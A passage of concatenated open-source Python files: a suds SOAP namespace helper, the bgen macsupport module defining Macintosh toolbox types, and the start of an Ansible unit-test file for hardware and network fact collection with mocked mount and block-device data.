# This program is free software; you can redistribute it and/or modify # it under the terms of the (LGPL) GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library Lesser General Public License for more details at # ( http://www.gnu.org/licenses/lgpl.html ). # # You should have received a copy of the GNU Lesser General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # written by: Jeff Ortel ( jortel@redhat.com ) from suds import * from suds.sax import Namespace, splitPrefix def qualify(ref, resolvers, defns=Namespace.default): """ Get a reference that is I{qualified} by namespace. @param ref: A referenced schema type name. @type ref: str @param resolvers: A list of objects to be used to resolve types. @type resolvers: [L{sax.element.Element},] @param defns: An optional target namespace used to qualify references when no prefix is specified. @type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed. @return: A qualified reference. @rtype: (name, namespace-uri) """ ns = None p, n = splitPrefix(ref) if p is not None: if not isinstance(resolvers, (list, tuple)): resolvers = (resolvers,) for r in resolvers: resolved = r.resolvePrefix(p) if resolved[1] is not None: ns = resolved break if ns is None: raise Exception('prefix (%s) not resolved' % p) else: ns = defns return (n, ns[1]) def isqref(object): """ Get whether the object is a I{qualified reference}. @param object: An object to be tested. @type object: I{any} @rtype: boolean @see: L{qualify} """ return (\ isinstance(object, tuple) and \ len(object) == 2 and \ isinstance(object[0], basestring) and \ isinstance(object[1], basestring)) class Filter: def __init__(self, inclusive=False, *items): self.inclusive = inclusive self.items = items def __contains__(self, x): if self.inclusive: result = ( x in self.items ) else: result = ( x not in self.items ) return result
lgpl-3.0
bob-the-hamster/commandergenius
project/jni/python/src/Tools/bgen/bgen/macsupport.py
48
7631
"""\ Augment the "bgen" package with definitions that are useful on the Apple Macintosh. Intended usage is "from macsupport import *" -- this implies all bgen's goodies. """ # Import everything from bgen (for ourselves as well as for re-export) from bgen import * # Simple types Boolean = Type("Boolean", "b") SignedByte = Type("SignedByte", "b") Size = Type("Size", "l") Style = Type("Style", "b") StyleParameter = Type("StyleParameter", "h") CharParameter = Type("CharParameter", "h") TextEncoding = Type("TextEncoding", "l") ByteCount = Type("ByteCount", "l") Duration = Type("Duration", "l") ByteOffset = Type("ByteOffset", "l") OptionBits = Type("OptionBits", "l") ItemCount = Type("ItemCount", "l") PBVersion = Type("PBVersion", "l") ScriptCode = Type("ScriptCode", "h") LangCode = Type("LangCode", "h") RegionCode = Type("RegionCode", "h") UInt8 = Type("UInt8", "b") SInt8 = Type("SInt8", "b") UInt16 = Type("UInt16", "H") SInt16 = Type("SInt16", "h") UInt32 = Type("UInt32", "l") SInt32 = Type("SInt32", "l") Float32 = Type("Float32", "f") wide = OpaqueByValueType("wide", "PyMac_Buildwide", "PyMac_Getwide") wide_ptr = OpaqueType("wide", "PyMac_Buildwide", "PyMac_Getwide") # Pascal strings ConstStr255Param = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255") Str255 = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255") StringPtr = OpaqueByValueType("StringPtr", "PyMac_BuildStr255", "PyMac_GetStr255") ConstStringPtr = StringPtr # File System Specifications FSSpec_ptr = OpaqueType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec") FSSpec = OpaqueByValueStructType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec") FSRef_ptr = OpaqueType("FSRef", "PyMac_BuildFSRef", "PyMac_GetFSRef") FSRef = OpaqueByValueStructType("FSRef", "PyMac_BuildFSRef", "PyMac_GetFSRef") # OSType and ResType: 4-byte character strings def OSTypeType(typename): return OpaqueByValueType(typename, "PyMac_BuildOSType", "PyMac_GetOSType") OSType = OSTypeType("OSType") ResType = OSTypeType("ResType") FourCharCode = OSTypeType("FourCharCode") # Version numbers NumVersion = OpaqueByValueType("NumVersion", "PyMac_BuildNumVersion", "BUG") # Handles (always resources in our case) Handle = OpaqueByValueType("Handle", "ResObj") MenuHandle = OpaqueByValueType("MenuHandle", "MenuObj") MenuRef = MenuHandle ControlHandle = OpaqueByValueType("ControlHandle", "CtlObj") ControlRef = ControlHandle # Windows and Dialogs WindowPtr = OpaqueByValueType("WindowPtr", "WinObj") WindowRef = WindowPtr DialogPtr = OpaqueByValueType("DialogPtr", "DlgObj") DialogRef = DialogPtr ExistingWindowPtr = OpaqueByValueType("WindowPtr", "WinObj_WhichWindow", "BUG") ExistingDialogPtr = OpaqueByValueType("DialogPtr", "DlgObj_WhichDialog", "BUG") # NULL pointer passed in as optional storage -- not present in Python version NullStorage = FakeType("(void *)0") # More standard datatypes Fixed = OpaqueByValueType("Fixed", "PyMac_BuildFixed", "PyMac_GetFixed") # Quickdraw data types Rect = Rect_ptr = OpaqueType("Rect", "PyMac_BuildRect", "PyMac_GetRect") Point = OpaqueByValueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint") Point_ptr = OpaqueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint") # Event records EventRecord = OpaqueType("EventRecord", "PyMac_BuildEventRecord", "PyMac_GetEventRecord") EventRecord_ptr = EventRecord # CoreFoundation datatypes CFTypeRef = OpaqueByValueType("CFTypeRef", "CFTypeRefObj") CFStringRef = OpaqueByValueType("CFStringRef", "CFStringRefObj") CFMutableStringRef = OpaqueByValueType("CFMutableStringRef", "CFMutableStringRefObj") CFArrayRef = OpaqueByValueType("CFArrayRef", "CFArrayRefObj") CFMutableArrayRef = OpaqueByValueType("CFMutableArrayRef", "CFMutableArrayRefObj") CFDictionaryRef = OpaqueByValueType("CFDictionaryRef", "CFDictionaryRefObj") CFMutableDictionaryRef = OpaqueByValueType("CFMutableDictionaryRef", "CFMutableDictionaryRefObj") CFURLRef = OpaqueByValueType("CFURLRef", "CFURLRefObj") OptionalCFURLRef = OpaqueByValueType("CFURLRef", "OptionalCFURLRefObj") # OSErr is special because it is turned into an exception # (Could do this with less code using a variant of mkvalue("O&")?) class OSErrType(Type): def errorCheck(self, name): Output("if (%s != noErr) return PyMac_Error(%s);", name, name) self.used = 1 OSErr = OSErrType("OSErr", 'h') OSStatus = OSErrType("OSStatus", 'l') # Various buffer types InBuffer = VarInputBufferType('char', 'long', 'l') # (buf, len) UcharInBuffer = VarInputBufferType('unsigned char', 'long', 'l') # (buf, len) OptionalInBuffer = OptionalVarInputBufferType('char', 'long', 'l') # (buf, len) InOutBuffer = HeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, len) VarInOutBuffer = VarHeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, &len) OutBuffer = HeapOutputBufferType('char', 'long', 'l') # (buf, len) VarOutBuffer = VarHeapOutputBufferType('char', 'long', 'l') # (buf, &len) VarVarOutBuffer = VarVarHeapOutputBufferType('char', 'long', 'l') # (buf, len, &len) # Unicode arguments sometimes have reversed len, buffer (don't understand why Apple did this...) class VarUnicodeInputBufferType(VarInputBufferType): def getargsFormat(self): return "u#" class VarUnicodeReverseInputBufferType(ReverseInputBufferMixin, VarUnicodeInputBufferType): pass UnicodeInBuffer = VarUnicodeInputBufferType('UniChar', 'UniCharCount', 'l') UnicodeReverseInBuffer = VarUnicodeReverseInputBufferType('UniChar', 'UniCharCount', 'l') UniChar_ptr = InputOnlyType("UniCharPtr", "u") # Predefine various pieces of program text to be passed to Module() later: # Stuff added immediately after the system include files includestuff = """ #include "pymactoolbox.h" /* Macro to test whether a weak-loaded CFM function exists */ #define PyMac_PRECHECK(rtn) do { if ( &rtn == NULL ) {\\ PyErr_SetString(PyExc_NotImplementedError, \\ "Not available in this shared library/OS version"); \\ return NULL; \\ }} while(0) """ # Stuff added just before the module's init function finalstuff = """ """ # Stuff added inside the module's init function initstuff = """ """ # Generator classes with a twist -- if the function returns OSErr, # its mode is manipulated so that it turns into an exception or disappears # (and its name is changed to _err, for documentation purposes). # This requires that the OSErr type (defined above) has a non-trivial # errorCheck method. class OSErrMixIn: "Mix-in class to treat OSErr/OSStatus return values special" def makereturnvar(self): if self.returntype.__class__ == OSErrType: return Variable(self.returntype, "_err", ErrorMode) else: return Variable(self.returntype, "_rv", OutMode) class OSErrFunctionGenerator(OSErrMixIn, FunctionGenerator): pass class OSErrMethodGenerator(OSErrMixIn, MethodGenerator): pass class WeakLinkMixIn: "Mix-in to test the function actually exists (!= NULL) before calling" def precheck(self): Output('#ifndef %s', self.name) Output('PyMac_PRECHECK(%s);', self.name) Output('#endif') class WeakLinkFunctionGenerator(WeakLinkMixIn, FunctionGenerator): pass class WeakLinkMethodGenerator(WeakLinkMixIn, MethodGenerator): pass class OSErrWeakLinkFunctionGenerator(OSErrMixIn, WeakLinkMixIn, FunctionGenerator): pass class OSErrWeakLinkMethodGenerator(OSErrMixIn, WeakLinkMixIn, MethodGenerator): pass class MacModule(Module): "Subclass which gets the exception initializer from macglue.c" def exceptionInitializer(self): return "PyMac_GetOSErrException()"
lgpl-2.1
dlazz/ansible
test/units/module_utils/facts/test_facts.py
45
22750
# This file is part of Ansible # -*- coding: utf-8 -*- # # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Make coding more python3-ish from __future__ import (absolute_import, division) __metaclass__ = type import os import pytest # for testing from units.compat import unittest from units.compat.mock import Mock, patch from ansible.module_utils import facts from ansible.module_utils.facts import hardware from ansible.module_utils.facts import network from ansible.module_utils.facts import virtual class BaseTestFactsPlatform(unittest.TestCase): platform_id = 'Generic' fact_class = hardware.base.Hardware collector_class = None """Verify that the automagic in Hardware.__new__ selects the right subclass.""" @patch('platform.system') def test_new(self, mock_platform): if not self.fact_class: pytest.skip('This platform (%s) does not have a fact_class.' % self.platform_id) mock_platform.return_value = self.platform_id inst = self.fact_class(module=Mock(), load_on_init=False) self.assertIsInstance(inst, self.fact_class) self.assertEqual(inst.platform, self.platform_id) def test_subclass(self): if not self.fact_class: pytest.skip('This platform (%s) does not have a fact_class.' % self.platform_id) # 'Generic' will try to map to platform.system() that we are not mocking here if self.platform_id == 'Generic': return inst = self.fact_class(module=Mock(), load_on_init=False) self.assertIsInstance(inst, self.fact_class) self.assertEqual(inst.platform, self.platform_id) def test_collector(self): if not self.collector_class: pytest.skip('This test class needs to be updated to specify collector_class') inst = self.collector_class() self.assertIsInstance(inst, self.collector_class) self.assertEqual(inst._platform, self.platform_id) class TestLinuxFactsPlatform(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = hardware.linux.LinuxHardware collector_class = hardware.linux.LinuxHardwareCollector class TestHurdFactsPlatform(BaseTestFactsPlatform): platform_id = 'GNU' fact_class = hardware.hurd.HurdHardware collector_class = hardware.hurd.HurdHardwareCollector class TestSunOSHardware(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = hardware.sunos.SunOSHardware collector_class = hardware.sunos.SunOSHardwareCollector class TestOpenBSDHardware(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = hardware.openbsd.OpenBSDHardware collector_class = hardware.openbsd.OpenBSDHardwareCollector class TestFreeBSDHardware(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = hardware.freebsd.FreeBSDHardware collector_class = hardware.freebsd.FreeBSDHardwareCollector class TestDragonFlyHardware(BaseTestFactsPlatform): platform_id = 'DragonFly' fact_class = None collector_class = hardware.dragonfly.DragonFlyHardwareCollector class TestNetBSDHardware(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = hardware.netbsd.NetBSDHardware collector_class = hardware.netbsd.NetBSDHardwareCollector class TestAIXHardware(BaseTestFactsPlatform): platform_id = 'AIX' fact_class = hardware.aix.AIXHardware collector_class = hardware.aix.AIXHardwareCollector class TestHPUXHardware(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = hardware.hpux.HPUXHardware collector_class = hardware.hpux.HPUXHardwareCollector class TestDarwinHardware(BaseTestFactsPlatform): platform_id = 'Darwin' fact_class = hardware.darwin.DarwinHardware collector_class = hardware.darwin.DarwinHardwareCollector class TestGenericNetwork(BaseTestFactsPlatform): platform_id = 'Generic' fact_class = network.base.Network class TestHurdPfinetNetwork(BaseTestFactsPlatform): platform_id = 'GNU' fact_class = network.hurd.HurdPfinetNetwork collector_class = network.hurd.HurdNetworkCollector class TestLinuxNetwork(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = network.linux.LinuxNetwork collector_class = network.linux.LinuxNetworkCollector class TestGenericBsdIfconfigNetwork(BaseTestFactsPlatform): platform_id = 'Generic_BSD_Ifconfig' fact_class = network.generic_bsd.GenericBsdIfconfigNetwork collector_class = None class TestHPUXNetwork(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = network.hpux.HPUXNetwork collector_class = network.hpux.HPUXNetworkCollector class TestDarwinNetwork(BaseTestFactsPlatform): platform_id = 'Darwin' fact_class = network.darwin.DarwinNetwork collector_class = network.darwin.DarwinNetworkCollector class TestFreeBSDNetwork(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = network.freebsd.FreeBSDNetwork collector_class = network.freebsd.FreeBSDNetworkCollector class TestDragonFlyNetwork(BaseTestFactsPlatform): platform_id = 'DragonFly' fact_class = network.dragonfly.DragonFlyNetwork collector_class = network.dragonfly.DragonFlyNetworkCollector class TestAIXNetwork(BaseTestFactsPlatform): platform_id = 'AIX' fact_class = network.aix.AIXNetwork collector_class = network.aix.AIXNetworkCollector class TestNetBSDNetwork(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = network.netbsd.NetBSDNetwork collector_class = network.netbsd.NetBSDNetworkCollector class TestOpenBSDNetwork(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = network.openbsd.OpenBSDNetwork collector_class = network.openbsd.OpenBSDNetworkCollector class TestSunOSNetwork(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = network.sunos.SunOSNetwork collector_class = network.sunos.SunOSNetworkCollector class TestLinuxVirtual(BaseTestFactsPlatform): platform_id = 'Linux' fact_class = virtual.linux.LinuxVirtual collector_class = virtual.linux.LinuxVirtualCollector class TestFreeBSDVirtual(BaseTestFactsPlatform): platform_id = 'FreeBSD' fact_class = virtual.freebsd.FreeBSDVirtual collector_class = virtual.freebsd.FreeBSDVirtualCollector class TestNetBSDVirtual(BaseTestFactsPlatform): platform_id = 'NetBSD' fact_class = virtual.netbsd.NetBSDVirtual collector_class = virtual.netbsd.NetBSDVirtualCollector class TestOpenBSDVirtual(BaseTestFactsPlatform): platform_id = 'OpenBSD' fact_class = virtual.openbsd.OpenBSDVirtual collector_class = virtual.openbsd.OpenBSDVirtualCollector class TestHPUXVirtual(BaseTestFactsPlatform): platform_id = 'HP-UX' fact_class = virtual.hpux.HPUXVirtual collector_class = virtual.hpux.HPUXVirtualCollector class TestSunOSVirtual(BaseTestFactsPlatform): platform_id = 'SunOS' fact_class = virtual.sunos.SunOSVirtual collector_class = virtual.sunos.SunOSVirtualCollector LSBLK_OUTPUT = b""" /dev/sda /dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0 /dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK /dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d /dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce /dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d /dev/sr0 /dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390 /dev/loop1 7c1b0f30-cf34-459f-9a70-2612f82b870a /dev/loop9 0f031512-ab15-497d-9abd-3a512b4a9390 /dev/loop9 7c1b4444-cf34-459f-9a70-2612f82b870a /dev/mapper/docker-253:1-1050967-pool /dev/loop2 /dev/mapper/docker-253:1-1050967-pool """ LSBLK_OUTPUT_2 = b""" /dev/sda /dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0 /dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK /dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d /dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce /dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d /dev/mapper/an-example-mapper with a space in the name 84639acb-013f-4d2f-9392-526a572b4373 /dev/sr0 /dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390 """ LSBLK_UUIDS = {'/dev/sda1': '66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK'} UDEVADM_UUID = 'N/A' MTAB = """ sysfs /sys sysfs rw,seclabel,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 devtmpfs /dev devtmpfs rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755 0 0 securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0 tmpfs /dev/shm tmpfs rw,seclabel,nosuid,nodev 0 0 devpts /dev/pts devpts rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,seclabel,nosuid,nodev,mode=755 0 0 tmpfs /sys/fs/cgroup tmpfs ro,seclabel,nosuid,nodev,noexec,mode=755 0 0 cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd 0 0 pstore /sys/fs/pstore pstore rw,seclabel,nosuid,nodev,noexec,relatime 0 0 cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0 cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0 cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0 cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0 cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0 cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0 cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0 cgroup /sys/fs/cgroup/hugetlb cgroup rw,nosuid,nodev,noexec,relatime,hugetlb 0 0 cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0 cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0 configfs /sys/kernel/config configfs rw,relatime 0 0 /dev/mapper/fedora_dhcp129--186-root / ext4 rw,seclabel,relatime,data=ordered 0 0 selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0 systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct 0 0 debugfs /sys/kernel/debug debugfs rw,seclabel,relatime 0 0 hugetlbfs /dev/hugepages hugetlbfs rw,seclabel,relatime 0 0 tmpfs /tmp tmpfs rw,seclabel 0 0 mqueue /dev/mqueue mqueue rw,seclabel,relatime 0 0 /dev/loop0 /var/lib/machines btrfs rw,seclabel,relatime,space_cache,subvolid=5,subvol=/ 0 0 /dev/sda1 /boot ext4 rw,seclabel,relatime,data=ordered 0 0 /dev/mapper/fedora_dhcp129--186-home /home ext4 rw,seclabel,relatime,data=ordered 0 0 tmpfs /run/user/1000 tmpfs rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000 0 0 gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0 grimlock.g.a: /home/adrian/sshfs-grimlock fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:test_path/path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote-2 fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 grimlock.g.a:/mnt/data/foto's /home/adrian/fotos fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0 """ MTAB_ENTRIES = [ [ 'sysfs', '/sys', 'sysfs', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0' ], ['proc', '/proc', 'proc', 'rw,nosuid,nodev,noexec,relatime', '0', '0'], [ 'devtmpfs', '/dev', 'devtmpfs', 'rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755', '0', '0' ], [ 'securityfs', '/sys/kernel/security', 'securityfs', 'rw,nosuid,nodev,noexec,relatime', '0', '0' ], ['tmpfs', '/dev/shm', 'tmpfs', 'rw,seclabel,nosuid,nodev', '0', '0'], [ 'devpts', '/dev/pts', 'devpts', 'rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000', '0', '0' ], ['tmpfs', '/run', 'tmpfs', 'rw,seclabel,nosuid,nodev,mode=755', '0', '0'], [ 'tmpfs', '/sys/fs/cgroup', 'tmpfs', 'ro,seclabel,nosuid,nodev,noexec,mode=755', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/systemd', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd', '0', '0' ], [ 'pstore', '/sys/fs/pstore', 'pstore', 'rw,seclabel,nosuid,nodev,noexec,relatime', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/devices', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,devices', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/freezer', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,freezer', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/memory', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,memory', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/pids', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,pids', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/blkio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,blkio', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/cpuset', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpuset', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/cpu,cpuacct', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,cpu,cpuacct', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/hugetlb', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,hugetlb', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/perf_event', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,perf_event', '0', '0' ], [ 'cgroup', '/sys/fs/cgroup/net_cls,net_prio', 'cgroup', 'rw,nosuid,nodev,noexec,relatime,net_cls,net_prio', '0', '0' ], ['configfs', '/sys/kernel/config', 'configfs', 'rw,relatime', '0', '0'], [ '/dev/mapper/fedora_dhcp129--186-root', '/', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0' ], ['selinuxfs', '/sys/fs/selinux', 'selinuxfs', 'rw,relatime', '0', '0'], [ 'systemd-1', '/proc/sys/fs/binfmt_misc', 'autofs', 'rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct', '0', '0' ], ['debugfs', '/sys/kernel/debug', 'debugfs', 'rw,seclabel,relatime', '0', '0'], [ 'hugetlbfs', '/dev/hugepages', 'hugetlbfs', 'rw,seclabel,relatime', '0', '0' ], ['tmpfs', '/tmp', 'tmpfs', 'rw,seclabel', '0', '0'], ['mqueue', '/dev/mqueue', 'mqueue', 'rw,seclabel,relatime', '0', '0'], [ '/dev/loop0', '/var/lib/machines', 'btrfs', 'rw,seclabel,relatime,space_cache,subvolid=5,subvol=/', '0', '0' ], ['/dev/sda1', '/boot', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'], # A 'none' fstype ['/dev/sdz3', '/not/a/real/device', 'none', 'rw,seclabel,relatime,data=ordered', '0', '0'], # lets assume this is a bindmount ['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'], [ '/dev/mapper/fedora_dhcp129--186-home', '/home', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0' ], [ 'tmpfs', '/run/user/1000', 'tmpfs', 'rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000', '0', '0' ], [ 'gvfsd-fuse', '/run/user/1000/gvfs', 'fuse.gvfsd-fuse', 'rw,nosuid,nodev,relatime,user_id=1000,group_id=1000', '0', '0' ], ['fusectl', '/sys/fs/fuse/connections', 'fusectl', 'rw,relatime', '0', '0']] BIND_MOUNTS = ['/not/a/real/bind_mount'] with open(os.path.join(os.path.dirname(__file__), 'fixtures/findmount_output.txt')) as f: FINDMNT_OUTPUT = f.read() class TestFactsLinuxHardwareGetMountFacts(unittest.TestCase): # FIXME: mock.patch instead def setUp(self): # The @timeout tracebacks if there isn't a GATHER_TIMEOUT is None (the default until get_all_facts sets it via global) facts.GATHER_TIMEOUT = 10 def tearDown(self): facts.GATHER_TIMEOUT = None # The Hardware subclasses freakout if instaniated directly, so # mock platform.system and inst Hardware() so we get a LinuxHardware() # we can test. @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._mtab_entries', return_value=MTAB_ENTRIES) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._find_bind_mounts', return_value=BIND_MOUNTS) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._lsblk_uuid', return_value=LSBLK_UUIDS) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._udevadm_uuid', return_value=UDEVADM_UUID) def test_get_mount_facts(self, mock_lsblk_uuid, mock_find_bind_mounts, mock_mtab_entries, mock_udevadm_uuid): module = Mock() # Returns a LinuxHardware-ish lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) # Nothing returned, just self.facts modified as a side effect mount_facts = lh.get_mount_facts() self.assertIsInstance(mount_facts, dict) self.assertIn('mounts', mount_facts) self.assertIsInstance(mount_facts['mounts'], list) self.assertIsInstance(mount_facts['mounts'][0], dict) @patch('ansible.module_utils.facts.hardware.linux.get_file_content', return_value=MTAB) def test_get_mtab_entries(self, mock_get_file_content): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) mtab_entries = lh._mtab_entries() self.assertIsInstance(mtab_entries, list) self.assertIsInstance(mtab_entries[0], list) self.assertEqual(len(mtab_entries), 38) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_findmnt', return_value=(0, FINDMNT_OUTPUT, '')) def test_find_bind_mounts(self, mock_run_findmnt): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() # If bind_mounts becomes another seq type, feel free to change self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 1) self.assertIn('/not/a/real/bind_mount', bind_mounts) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_findmnt', return_value=(37, '', '')) def test_find_bind_mounts_non_zero(self, mock_run_findmnt): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 0) def test_find_bind_mounts_no_findmnts(self): module = Mock() module.get_bin_path = Mock(return_value=None) lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) bind_mounts = lh._find_bind_mounts() self.assertIsInstance(bind_mounts, set) self.assertEqual(len(bind_mounts), 0) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(0, LSBLK_OUTPUT, '')) def test_lsblk_uuid(self, mock_run_lsblk): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertIn(b'/dev/loop9', lsblk_uuids) self.assertIn(b'/dev/sda1', lsblk_uuids) self.assertEqual(lsblk_uuids[b'/dev/sda1'], b'32caaec3-ef40-4691-a3b6-438c3f9bc1c0') @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(37, LSBLK_OUTPUT, '')) def test_lsblk_uuid_non_zero(self, mock_run_lsblk): module = Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertEqual(len(lsblk_uuids), 0) def test_lsblk_uuid_no_lsblk(self): module = Mock() module.get_bin_path = Mock(return_value=None) lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertEqual(len(lsblk_uuids), 0) @patch('ansible.module_utils.facts.hardware.linux.LinuxHardware._run_lsblk', return_value=(0, LSBLK_OUTPUT_2, '')) def test_lsblk_uuid_dev_with_space_in_name(self, mock_run_lsblk): module = Mock() lh = hardware.linux.LinuxHardware(module=module, 